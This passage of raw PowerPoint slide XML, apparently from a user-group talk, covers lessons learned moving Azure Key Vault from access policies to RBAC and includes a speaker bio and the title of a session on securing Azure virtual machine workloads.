    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2183576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7B55-4CFA-E9D0-593E-6430452E716D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Role Based Access Control (RBAC) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lessons learned with KeyVault (Access Policies vs RBAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B33D124-816C-85B3-358B-8AEB303FC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>KeyVault  - Access policy configuration Issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Causing application issues when retrieving secrets </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> policy 'drift' across different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KeyVaults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Manual interventions by Devs for app access identities and users with differing access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Infrastructure as code challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="598805" lvl="1">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>More code required to create role access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598805" lvl="1">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Complexity between app and Infra DevOps pipelines (remote state outputs from Terraform)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="612979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7B55-4CFA-E9D0-593E-6430452E716D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Role Based Access Control (RBAC) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lessons learned with KeyVault (Access Policies vs RBAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B33D124-816C-85B3-358B-8AEB303FC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="2011680"/>
            <a:ext cx="11061253" cy="3766185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KeyVault RBAC considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Preferred option is use AD group membership for access, however this requires planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598932" lvl="1">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What AD group for what role/roles (secrets reader, user and officer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598932" lvl="1">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How does this affect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> pipelines and dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AD group membership RBAC sync period can vary resulting in access being unavailable for extended period beyond the Microsoft </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RBAC invalidates access policy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BB1270-60E4-4BF9-B87F-19CA5B7943AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5406901" y="4700270"/>
            <a:ext cx="4143405" cy="888767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6061288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510B73-EF36-41AD-8036-67BAC900D506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Questions ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39716199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6321C-14B0-49E3-85A9-F4DD483449F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234544" y="2052903"/>
            <a:ext cx="5303521" cy="2502131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Break </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>10-15 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB375DA3-77C9-45DB-922D-F17DD5409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705" y="865874"/>
            <a:ext cx="4876190" cy="4876190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F153E49-D3D9-4F36-989B-702DD8632CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084416" y="4759745"/>
            <a:ext cx="3706479" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Pizza stickers created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DinosoftLabs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087138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2A51A-FA94-4FC4-A945-43D6AD22B95F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Marius</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F640D8E-8615-4D48-A730-9700040B055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8682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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E36B62D-34E6-41D4-B3AA-AC21AB3879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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Tittel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5081043" y="770467"/>
            <a:ext cx="6608963" cy="5098992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Securing Virtual Machine Workloads in Azure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="nb-NO" sz="4800" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PPT here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="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br>
              <a:rPr lang="nb-NO" sz="4000" b="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br>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/msugn/events</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E92409-AD19-4CE3-9956-8C03560F7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90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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 10" descr="Hacker - Free people icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6A2824-07FF-4490-B270-C5103AD19A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271" y="1470617"/>
            <a:ext cx="3226468" cy="3226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744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C0677-A7E3-4972-F453-226DE3EE3FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540454" y="750432"/>
            <a:ext cx="10772775" cy="505158"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Who am I?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100BFA5D-0332-4BF1-AF52-4199F1362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9226" y="5395555"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B010374-2DF6-427B-BEAE-A5491B1D71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9226" y="4930753"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332982DE-B6BE-4112-9BFF-ABD70AE6410A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626469" y="4914489"/>
            <a:ext cx="13260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4"/>
              </a:rPr>
              <a:t>@msandbu</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="18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352D9C0E-1ACE-4174-A91F-76EA75C7F9BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626469" y="5363027"/>
            <a:ext cx="25406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5"/>
              </a:rPr>
              <a:t>Linkedin.com/msandbu</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="18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1587ED5B-4A43-4B3B-8F7D-14B2CD230431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177417" y="4108014"/>
            <a:ext cx="381181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20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Marius Sandbu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Cloud Evangelist @ Sopra Steria</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="20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8" name="Picture 17" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3861DA-AE8C-4576-8B37-3E2165DFB4B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99226" y="5844093"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11068AA8-E6D8-4C1E-AC13-DF6D250261DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636030" y="5813199"/>
            <a:ext cx="152202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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>msandbu.org</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="1"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10" name="Picture 9" descr="A picture containing person, outdoor, mammal, petting&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD45CBF7-0B08-4738-87B6-6B4919F9741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7280" y="1457197"/>
            <a:ext cx="4463676" cy="2515501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Trusselsky logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFC2086-32F1-4A7A-80D7-72F8C23AC6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7575" y="4262052"/>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loudFirst Podcast logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620BDB6A-8D95-4300-B604-344596DA9D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35230" y="4076701"/>
            <a:ext cx="2200532" cy="2200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996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09E30F-4A95-4EB8-B9FD-5DE2CA1BE242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="582730"/>
            <a:ext cx="4654968" cy="10254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nb-NO" sz="40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Agenda</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="40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 name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1542BDF6-5876-406D-A9B3-52C32E7B1619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
